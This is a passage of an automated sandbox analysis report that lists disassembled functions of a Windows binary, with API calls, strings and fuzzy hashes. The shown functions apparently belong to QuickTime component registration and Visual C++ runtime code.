Uniqueness

Uniqueness Score: -1.00%

Function 00404A20 Relevance: 6.1, APIs: 4, Instructions: 88comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00404A45
CoCreateInstance.OLE32(00418554,00000000,00000001,00418544,?), ref: 00404A5E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000208), ref: 00404AC9
CoUninitialize.OLE32 ref: 00404AF6

Memory Dump Source

Source File: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ByteCharCreateInitializeInstanceMultiUninitializeWide
String ID:
API String ID: 2968213145-0
Opcode ID: 40654735aa9b3ffd32fdf0a9c7260533aa561f2bf3466f7b4360c1721ff12ef4
Instruction ID: 9703fe5d3050ee0d0df0fb5bb8e48ad938ef7d50f396b8b34313f69aba96b78a
Opcode Fuzzy Hash: 40654735aa9b3ffd32fdf0a9c7260533aa561f2bf3466f7b4360c1721ff12ef4
Instruction Fuzzy Hash: 40318B71604305AFC700DFA4C888F9BB7A9FF88704F10496DF941DB290DA71E809CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00416740 Relevance: 1.5, APIs: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 00416762

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e4a602bf90e06d2f11f2ea297ce1cf778bb4c541b683b16a87f9e89c040d5022
Instruction ID: fb2e4fa6d945cfa54e207d717a7f40f688f54ed9d7555acfb4cd9047686f724d
Opcode Fuzzy Hash: e4a602bf90e06d2f11f2ea297ce1cf778bb4c541b683b16a87f9e89c040d5022
Instruction Fuzzy Hash: 79E09234E0420CEBCB00DFB5E909BDE7BB89F0C318F91456AEA25DA1C0DB74D6589759

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF2E Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000FEE0), ref: 0040FF33

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 691ec65454aac3d1bf4b6d9b3ba604b85bda87eac6487c42a7277c62c3e8ef03
Instruction ID: 1f27e41e4f17e5f98c28e2a68cd7691aa09134d5980bd07709cd30d9dbfab529
Opcode Fuzzy Hash: 691ec65454aac3d1bf4b6d9b3ba604b85bda87eac6487c42a7277c62c3e8ef03
Instruction Fuzzy Hash: BAA022F22883008BC300CF32FC082803AA2F300303300C03BE002C22B0EFB800008A0C

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF42 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040FF47

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 76bc6ca3fcbb3fbec6ce88e8252d1d898d10201793fc39ba85f420e8ea3f82f8
Instruction ID: 4c6af339876cd854ec9c181a35387f9fe616638a5c7f3cfb0bc108f7c9a687cd
Opcode Fuzzy Hash: 76bc6ca3fcbb3fbec6ce88e8252d1d898d10201793fc39ba85f420e8ea3f82f8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1D0 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

, xrefs: 0040C27F

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID:
String ID:
API String ID: 0-399585960
Opcode ID: e220dc48390efd51ab5fd300b508131748e6f0bb182b7e77518887557cb81a80
Instruction ID: 9cb193de3b413d1144f38d8076be6c1d7689da699f628ea3d1b5260a70190059
Opcode Fuzzy Hash: e220dc48390efd51ab5fd300b508131748e6f0bb182b7e77518887557cb81a80
Instruction Fuzzy Hash: 13710676908341CBC720DF69D891A6BB795AF94344F04867EFC85A7381EA38EC0587DA

Uniqueness

Uniqueness Score: -1.00%

Function 0040F734 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff940700e26693bd07947b2310195d3200c58ca9a4bd7093d0bbbd9286697ac
Instruction ID: 318e9ac8cd5432aeb5164c41226ce65f10aabbdcfc61b6bc66431431008769b6
Opcode Fuzzy Hash: dff940700e26693bd07947b2310195d3200c58ca9a4bd7093d0bbbd9286697ac
Instruction Fuzzy Hash: 8B21C772900204ABCB24DF69C8C09A7B7A5FF48310B09847AD915DB285D734F919C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00411FB0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 117fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 00412033
_strcat.LIBCMT ref: 00412046
_strlen.LIBCMT ref: 00412053
_strlen.LIBCMT ref: 00412062
_strncpy.LIBCMT ref: 00412079
_strlen.LIBCMT ref: 00412082
_strlen.LIBCMT ref: 0041208F
_strcat.LIBCMT ref: 004120AD
_strlen.LIBCMT ref: 004120F2
GetStdHandle.KERNEL32(000000F4,004190C0,00000000,?,00000000,00000000,00000000,00000000), ref: 004120FD
WriteFile.KERNEL32(00000000), ref: 00412104

Strings

Microsoft Visual C++ Runtime Library, xrefs: 004120D5
Runtime Error!Program: , xrefs: 004120A7
<program name unknown>, xrefs: 00412040
..., xrefs: 00412073

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3601721357-4022980321
Opcode ID: 2be8aebf147885ad1fb551dbef42dcfbfa29a7679ce46da3dfbaa0d88efc6783
Instruction ID: f206d1114fe70445d603268354525b17ee7bee9feb4efe3d57baa93896503491
Opcode Fuzzy Hash: 2be8aebf147885ad1fb551dbef42dcfbfa29a7679ce46da3dfbaa0d88efc6783
Instruction Fuzzy Hash: 263108329001086BDB24AB769C85EEA7769DB0C304F14891FFA25D3152DA7C95D4876C

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC10 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 166registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,00000000,?,?), ref: 0040E206
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32 ref: 0040E235
Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(?,?,?,?,?), ref: 0040E248

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040DC82
RegEnumKeyA.ADVAPI32(?,?,?,00000105), ref: 0040DCC0

Part of subcall function 0040E1E0: RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,00000000,?,?), ref: 0040E267

RegQueryValueExA.ADVAPI32(?,componentType,00000000,00000000,?,?), ref: 0040DD23
RegQueryValueExA.ADVAPI32(?,componentSubType,00000000,00000000,?,?), ref: 0040DD41
RegQueryValueExA.ADVAPI32(?,componentManufacturer,00000000,00000000,?,?), ref: 0040DD5F
RegQueryValueExA.ADVAPI32(?,doNotOverrideExistingApp,00000000,00000000,?,?), ref: 0040DD7D
RegCloseKey.ADVAPI32(?), ref: 0040DDBC
RegCloseKey.ADVAPI32(?), ref: 0040DDD6
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0040DDE7

Strings

componentManufacturer, xrefs: 0040DD55
componentType, xrefs: 0040DD19
doNotOverrideExistingApp, xrefs: 0040DD73
componentSubType, xrefs: 0040DD37
SOFTWARE\Apple Computer, Inc.\QuickTime\Installed File Types\, xrefs: 0040DC4C

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Query$OpenValue$Close$ChangeEnumInfoNotify
String ID: SOFTWARE\Apple Computer, Inc.\QuickTime\Installed File Types\$componentManufacturer$componentSubType$componentType$doNotOverrideExistingApp
API String ID: 1528866413-2685749110
Opcode ID: 260d548fb38b806a4be8bf6d27e0bdce1233dc54068d7272373adce556382618
Instruction ID: a602b449e427f44b7f423b25f42de78e13f6527453169ab57bc2f6d4b32639a7
Opcode Fuzzy Hash: 260d548fb38b806a4be8bf6d27e0bdce1233dc54068d7272373adce556382618
Instruction Fuzzy Hash: 245124B16043056FD310DF55CD85FABBBE8EFC8704F10491EF68997191E674E5048BAA

Uniqueness

Uniqueness Score: -1.00%

Function 004109D6 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 71libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,771C1100,00000000,0040F19D,?,004189C0,00000060), ref: 004109EE
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00410A06
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00410A13
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00410A20
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00410A2D
FlsAlloc.KERNEL32(0041088F,?,004189C0,00000060), ref: 00410A6A
FlsSetValue.KERNEL32(00000000,?,004189C0,00000060), ref: 00410A97
GetCurrentThreadId.KERNEL32 ref: 00410AAB

Part of subcall function 00410801: FlsFree.KERNEL32(00000005,00410AC0,?,004189C0,00000060), ref: 0041080C

Strings

FlsFree, xrefs: 00410A22
FlsGetValue, xrefs: 00410A08
kernel32.dll, xrefs: 004109E9
FlsAlloc, xrefs: 00410A00
FlsSetValue, xrefs: 00410A15

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
API String ID: 2355849793-282957996
Opcode ID: fe2351c655beba737470e61a6d58ec71d69d2f530120f7da21c61fb187eaef66
Instruction ID: 1de6897420d1c425c8afee651b49bc273d2ea7ef21913f60f0e3b49bc184799b
Opcode Fuzzy Hash: fe2351c655beba737470e61a6d58ec71d69d2f530120f7da21c61fb187eaef66
Instruction Fuzzy Hash: 402192715893009AC360AF36AD98AE77EE4EB55790710C13FE455C33A0EBBC84C18BAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040F59C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 100COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000118,00000104), ref: 0040F620
_strcat.LIBCMT ref: 0040F636
_strlen.LIBCMT ref: 0040F646
_strlen.LIBCMT ref: 0040F657
_strncpy.LIBCMT ref: 0040F671
_strlen.LIBCMT ref: 0040F67A
_strcat.LIBCMT ref: 0040F696

Strings

Microsoft Visual C++ Runtime Library, xrefs: 0040F6D1
Program: , xrefs: 0040F6A7
<program name unknown>, xrefs: 0040F62A
Unknown security failure detected!, xrefs: 0040F5E6
..., xrefs: 0040F66B

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: _strlen$_strcat$FileModuleName_strncpy
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
API String ID: 3058806289-3139599932
Opcode ID: 3fee9cc0e2a9e93319a40004b69aecc4cf5fec869ab7b597b8461e0add806b74
Instruction ID: cda818e9dfe0996b27ff64b74b7f8886f6d31a24e03b6a37d05fd0393194a260
Opcode Fuzzy Hash: 3fee9cc0e2a9e93319a40004b69aecc4cf5fec869ab7b597b8461e0add806b74
Instruction Fuzzy Hash: 4B31C171A402087BDB10AB628C46FDE36689F08758F10487FF504A7292DB7C9B86479D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C760 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 116windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000003), ref: 0040C7A1
SendMessageA.USER32(00000000), ref: 0040C7A8
EndDialog.USER32(?,00000000), ref: 0040C7C5
GetWindowRect.USER32(?,?), ref: 0040C7F3
GetDesktopWindow.USER32 ref: 0040C80E
GetWindowRect.USER32(00000000), ref: 0040C815
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 0040C86F
SetWindowTextA.USER32(?,00000000), ref: 0040C87D
GetDlgItem.USER32(?,00000003), ref: 0040C88F
SendMessageA.USER32(00000000), ref: 0040C896

Strings

VUUU, xrefs: 0040C839

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Window$ItemMessageRectSend$DesktopDialogText
String ID: VUUU
API String ID: 1679994732-2040033107
Opcode ID: a61a1d0d970583c7ec3e53de17e63264890c1b3e5f20c71b2cdf90206f966183
Instruction ID: ec5663dfeeaac22467200364bb19365777991a0d734886635a89217538be383a
Opcode Fuzzy Hash: a61a1d0d970583c7ec3e53de17e63264890c1b3e5f20c71b2cdf90206f966183
Instruction Fuzzy Hash: 5C31C532600601AFD314CB7CDC89BAB7B96ABCC700F48862DF649A72D0DA74E8018659

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDA0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 103registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E100: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E134
Part of subcall function 0040E100: RegOpenKeyExA.ADVAPI32 ref: 0040E16C
Part of subcall function 0040E100: RegCreateKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 0040E193

Part of subcall function 0040E100: RegCreateKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E1C6

RegSetValueExA.ADVAPI32(?,componentType,00000000,00000004,?,00000004), ref: 0040BE42
RegSetValueExA.ADVAPI32(?,componentSubType,00000000,00000004,?,00000004,?,00000004), ref: 0040BE57
RegSetValueExA.ADVAPI32(?,componentManufacturer,00000000,00000004,?,00000004,?,00000004), ref: 0040BE6C
RegSetValueExA.ADVAPI32(?,doNotOverrideExistingApp,00000000,00000004,?,00000004,?,00000004,?,00000004), ref: 0040BE81
RegCloseKey.ADVAPI32(?,?,00000004,?,00000004), ref: 0040BE87
RegCloseKey.ADVAPI32(?), ref: 0040BE8D

Strings

componentManufacturer, xrefs: 0040BE66
componentType, xrefs: 0040BE39
doNotOverrideExistingApp, xrefs: 0040BE7B
componentSubType, xrefs: 0040BE51
SOFTWARE\Apple Computer, Inc.\QuickTime\Installed File Types\, xrefs: 0040BDBB

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Value$Create$Close$Open
String ID: SOFTWARE\Apple Computer, Inc.\QuickTime\Installed File Types\$componentManufacturer$componentSubType$componentType$doNotOverrideExistingApp
API String ID: 3855488142-2685749110
Opcode ID: 780931d2bd4ce51c5bad75a64c0f13bf084d75b134f8a46a3139b5d89dfc2a6b
Instruction ID: 1d190fc52723d5e4cfad95a8931f26eedd874991a4634b1b90d9217d998dfd15
Opcode Fuzzy Hash: 780931d2bd4ce51c5bad75a64c0f13bf084d75b134f8a46a3139b5d89dfc2a6b
Instruction Fuzzy Hash: DE3187B5B40318B6D720D6A59C86FEF7B68DF49B10F10455AB704BB1C1DAB4AA0097EC

Uniqueness

Uniqueness Score: -1.00%

Function 00408F50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00408F5A
wsprintfA.USER32 ref: 00408F6B
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00408F7B
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408F8A

Part of subcall function 0040A470: LoadLibraryA.KERNEL32(?,?,00000000,00000000,00000000), ref: 0040A506
Part of subcall function 0040A470: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 0040A512
Part of subcall function 0040A470: LoadLibraryA.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 0040A57D

GetLastError.KERNEL32 ref: 00408FB7
FreeLibrary.KERNEL32(00000000), ref: 00408FCC
ReleaseMutex.KERNEL32(00000000), ref: 00408FFF
CloseHandle.KERNEL32(00000000), ref: 00409006

Strings

QTMLInitTermMutex%lx, xrefs: 00408F65
QuickTime.qts, xrefs: 00408FA1

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Library$ErrorLastLoadMutex$CloseCreateCurrentFreeHandleObjectProcessReleaseSingleWaitwsprintf
String ID: QTMLInitTermMutex%lx$QuickTime.qts
API String ID: 3059996374-2187790298
Opcode ID: 3164e5e94605138ab2e680df607fbe0e82e1abade7a850d20205a9c9b40a0874
Instruction ID: fb339f4a38f499e9fa757c346b1838733cb81005bb43f29075afbda2fce0d6dd
Opcode Fuzzy Hash: 3164e5e94605138ab2e680df607fbe0e82e1abade7a850d20205a9c9b40a0874
Instruction Fuzzy Hash: 1F21A476500602AFC3119B38AD456D73EA5EB48714B15823EE899E3392EF3888058BDD

Uniqueness

Uniqueness Score: -1.00%

Function 004147DC Relevance: 16.8, APIs: 11, Instructions: 309COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,004193E4,00000001,00000000,00000000,004193E8,0000003C,00410CF4,00000100,?,00000100,?,00000100,00000000,00000001), ref: 00414803
GetLastError.KERNEL32 ref: 00414815
MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004193E8,0000003C,00410CF4,00000100,?,00000100,?,00000100,00000000,00000001), ref: 0041489C
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041491D
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00414937
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 00414972

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 8130917be7e13aa97fb29cf184b9eba0631e8875ddf0545588587feb8e2e2735
Instruction ID: cbcf38b54753814650a1aa78cc567516db2f42a0a701d4b4dfc05589588e1d0e
Opcode Fuzzy Hash: 8130917be7e13aa97fb29cf184b9eba0631e8875ddf0545588587feb8e2e2735
Instruction Fuzzy Hash: 00B19BB2800119EFCF219FA1DC809EE7BB5FF48354F15813AF915A22A0D7399DA1DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00415EDE Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 235COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00415FC2
_strcat.LIBCMT ref: 00415FDF
___shr_12.LIBCMT ref: 004160A8

Strings

1#IND, xrefs: 00415FA8
1#INF, xrefs: 00415FB9
1#QNAN, xrefs: 00415FD6
?, xrefs: 00415F3F
1#SNAN, xrefs: 00415F8E

Memory Dump Source

